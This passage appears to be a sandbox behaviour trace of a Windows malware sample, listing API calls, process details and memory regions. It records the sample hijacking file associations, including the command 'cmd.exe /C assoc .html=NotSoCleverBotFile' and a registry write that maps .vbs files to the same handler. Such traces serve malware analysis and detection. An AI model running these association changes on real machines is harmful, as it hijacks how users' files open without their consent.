(_String1="assoc", _String2="DATE") returned -3 [0260.099] _wcsicmp (_String1="assoc", _String2="TIME") returned -19 [0260.099] _wcsicmp (_String1="assoc", _String2="PROMPT") returned -15 [0260.100] _wcsicmp (_String1="assoc", _String2="MD") returned -12 [0260.100] _wcsicmp (_String1="assoc", _String2="MKDIR") returned -12 [0260.100] _wcsicmp (_String1="assoc", _String2="RD") returned -17 [0260.100] _wcsicmp (_String1="assoc", _String2="RMDIR") returned -17 [0260.100] _wcsicmp (_String1="assoc", _String2="PATH") returned -15 [0260.100] _wcsicmp (_String1="assoc", _String2="GOTO") returned -6 [0260.100] _wcsicmp (_String1="assoc", _String2="SHIFT") returned -18 [0260.100] _wcsicmp (_String1="assoc", _String2="CLS") returned -2 [0260.100] _wcsicmp (_String1="assoc", _String2="CALL") returned -2 [0260.100] _wcsicmp (_String1="assoc", _String2="VERIFY") returned -21 [0260.100] _wcsicmp (_String1="assoc", _String2="VER") returned -21 [0260.100] _wcsicmp (_String1="assoc", _String2="VOL") returned -21 [0260.100] _wcsicmp (_String1="assoc", _String2="EXIT") returned -4 [0260.100] _wcsicmp (_String1="assoc", _String2="SETLOCAL") returned -18 [0260.100] _wcsicmp (_String1="assoc", _String2="ENDLOCAL") returned -4 [0260.100] _wcsicmp (_String1="assoc", _String2="TITLE") returned -19 [0260.100] _wcsicmp (_String1="assoc", _String2="START") returned -18 [0260.100] _wcsicmp (_String1="assoc", _String2="DPATH") returned -3 [0260.100] _wcsicmp (_String1="assoc", _String2="KEYS") returned -10 [0260.100] _wcsicmp (_String1="assoc", _String2="MOVE") returned -12 [0260.100] _wcsicmp (_String1="assoc", _String2="PUSHD") returned -15 [0260.100] _wcsicmp (_String1="assoc", _String2="POPD") returned -15 [0260.100] _wcsicmp (_String1="assoc", _String2="ASSOC") returned 0 [0260.100] GetProcessHeap () returned 0x550000 [0260.100] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x6c) returned 0x55ab60 [0260.102] GetProcessHeap () returned 0x550000 [0260.102] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x55ab60, Size=0x3a) returned 0x55ab60 [0260.103] GetProcessHeap () returned 0x550000 [0260.103] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x55ab60) returned 0x3a [0260.103] GetProcessHeap () returned 0x550000 [0260.103] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x46) returned 0x55aba8 [0260.103] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Classes", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19fa14 | out: phkResult=0x19fa14*=0xa0) returned 0x0 [0260.103] GetProcessHeap () returned 0x550000 [0260.103] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x6c) returned 0x55abf8 [0260.108] GetProcessHeap () returned 0x550000 [0260.108] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x55abf8, Size=0x3e) returned 0x55abf8 [0260.108] GetProcessHeap () returned 0x550000 [0260.108] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x55abf8) returned 0x3e [0260.108] GetProcessHeap () returned 0x550000 [0260.108] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x12) returned 0x557700 [0260.109] GetProcessHeap () returned 0x550000 [0260.109] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2e) returned 0x55ac40 [0260.109] RegCreateKeyExW (in: hKey=0xa0, lpSubKey=".vbs", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x19f9cc, lpdwDisposition=0x0 | out: phkResult=0x19f9cc*=0xa4, lpdwDisposition=0x0) returned 0x0 [0260.109] RegSetValueExW (in: hKey=0xa4, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="NotSoCleverBotFile", cbData=0x26 | out: lpData="NotSoCleverBotFile") returned 0x0 [0260.111] RegCloseKey (hKey=0xa4) returned 0x0 [0260.111] _vsnwprintf (in: _Buffer=0xd37940, _BufferCount=0x1fff, _Format="%s=%s\r\n", _ArgList=0x19f9ac | out: _Buffer=".vbs=NotSoCleverBotFile\r\n") returned 25 [0260.112] _get_osfhandle (_FileHandle=1) returned 0x3c [0260.112] GetFileType (hFile=0x3c) returned 0x2 [0260.112] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0260.112] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f984 | out: lpMode=0x19f984) returned 1 [0260.122] _get_osfhandle (_FileHandle=1) returned 0x3c [0260.122] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xd37940*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x19f99c, lpReserved=0x0 | out: lpBuffer=0xd37940*, lpNumberOfCharsWritten=0x19f99c*=0x19) returned 1 [0260.157] ApiSetQueryApiSetPresence () returned 0x0 [0260.157] ResolveDelayLoadedAPI () returned 0x6ab62230 [0260.163] DoSHChangeNotify () returned 0x0 [0260.404] GetProcessHeap () returned 0x550000 [0260.404] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x55ac40) returned 1 [0260.404] GetProcessHeap () returned 0x550000 [0260.404] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x557700) returned 1 [0260.404] RegCloseKey (hKey=0xa0) returned 0x0 [0260.404] _get_osfhandle (_FileHandle=1) returned 0x3c [0260.404] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0260.415] _get_osfhandle (_FileHandle=1) returned 0x3c [0260.415] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0260.415] _get_osfhandle (_FileHandle=0) returned 0x38 [0260.415] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0260.415] SetConsoleInputExeNameW () returned 0x1 [0260.415] GetConsoleOutputCP () returned 0x1b5 [0260.416] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0260.416] SetThreadUILanguage (LangId=0x0) returned 0x409 [0260.416] exit (_Code=0) Thread: id = 152 os_tid = 0x6b4 Process: id = "18" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x484da000" os_pid = "0x8c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0xe98" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1735 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1736 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1737 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1738 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1739 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1740 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1741 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1742 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1743 start_va = 0x7ff7625c0000 end_va = 0x7ff7625d0fff monitored = 0 entry_point = 0x7ff7625c16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1744 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1745 start_va = 0x90000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1746 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1747 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1748 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1749 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1750 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1751 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1752 start_va = 0x1b0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1753 start_va = 0x6c0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1754 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1755 start_va = 0x7ffd45030000 end_va = 0x7ffd45088fff monitored = 0 entry_point = 0x7ffd4503fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1756 start_va = 0x90000 end_va = 0x90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 1757 start_va = 0xb0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 1758 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1759 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1760 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1761 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1762 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1763 start_va = 0xa0000 end_va = 0xa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1764 start_va = 0x7ffd50380000 end_va = 0x7ffd504c2fff monitored = 0 entry_point = 0x7ffd503a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1765 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1766 start_va = 0x7ffd4e2e0000 end_va = 0x7ffd4e31afff monitored = 0 entry_point = 0x7ffd4e2e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1767 start_va = 0x7ffd4db80000 end_va = 0x7ffd4dc40fff monitored = 0 entry_point = 0x7ffd4dba0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1768 start_va = 0x7ffd4b010000 end_va = 0x7ffd4b195fff monitored = 0 entry_point = 0x7ffd4b05d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1769 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1770 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1771 start_va = 0x7c0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 1772 start_va = 0x7d0000 end_va = 0x957fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 1773 start_va = 0x960000 end_va = 0xae0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 1774 start_va = 0xaf0000 end_va = 0x1eeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 1775 start_va = 0x1ef0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 1776 start_va = 0x6d0000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 1777 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1778 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1779 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1780 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1781 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1782 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1783 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1784 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1785 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1786 start_va = 0x7ffd4b470000 end_va = 0x7ffd4b505fff monitored = 0 entry_point = 0x7ffd4b495570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1787 start_va = 0x1ef0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 1788 start_va = 0x1fe0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 1789 start_va = 0x1ff0000 end_va = 0x2326fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1790 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1791 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1792 start_va = 0x710000 end_va = 0x769fff monitored = 1 entry_point = 0x7253f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1793 start_va = 0x770000 end_va = 0x790fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 1794 start_va = 0x2330000 end_va = 0x2546fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 1795 start_va = 0x2550000 end_va = 0x2767fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 1796 start_va = 0x2770000 end_va = 0x2887fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 1797 start_va = 0x2890000 end_va = 0x2aaafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 1798 start_va = 0x2ab0000 end_va = 0x2bb8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ab0000" filename = "" Region: id = 1799 start_va = 0x710000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 1800 start_va = 0x7ffd4e320000 end_va = 0x7ffd4e479fff monitored = 0 entry_point = 0x7ffd4e3638e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1801 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1802 start_va = 0x1ef0000 end_va = 0x1fabfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ef0000" filename = "" Region: id = 1803 start_va = 0x1fd0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 1804 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1805 start_va = 0x7ffd4a370000 end_va = 0x7ffd4a391fff monitored = 0 entry_point = 0x7ffd4a371a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1806 start_va = 0x7ffd4b200000 end_va = 0x7ffd4b212fff monitored = 0 entry_point = 0x7ffd4b202760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1807 start_va = 0x7ffd4c900000 end_va = 0x7ffd4c955fff monitored = 0 entry_point = 0x7ffd4c910bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1808 start_va = 0x80000 end_va = 0x86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1809 start_va = 0x750000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 1810 start_va = 0x760000 end_va = 0x760fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 1811 start_va = 0x770000 end_va = 0x774fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1812 start_va = 0x780000 end_va = 0x780fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 1813 start_va = 0x790000 end_va = 0x791fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 1814 start_va = 0x7ffd43ba0000 end_va = 0x7ffd43e13fff monitored = 0 entry_point = 0x7ffd43c10400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 1815 start_va = 0x7a0000 end_va = 0x7a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1816 start_va = 0x7b0000 end_va = 0x7b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Thread: id = 148 os_tid = 0xd4c Thread: id = 149 os_tid = 0xdd0 Thread: id = 150 os_tid = 0x10cc Thread: id = 151 os_tid = 0x13f4 Process: id = "19" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x47a03000" os_pid = "0x1024" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C assoc .html=NotSoCleverBotFile" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1862 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1863 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1864 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1865 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1866 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1867 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1868 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1869 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1870 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1871 start_va = 0xd00000 end_va = 0xd51fff monitored = 1 entry_point = 0xd14fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1872 start_va = 0xd60000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 1873 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1874 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1875 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1876 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1877 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 1878 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1879 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 1880 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1881 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1882 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1883 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1884 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 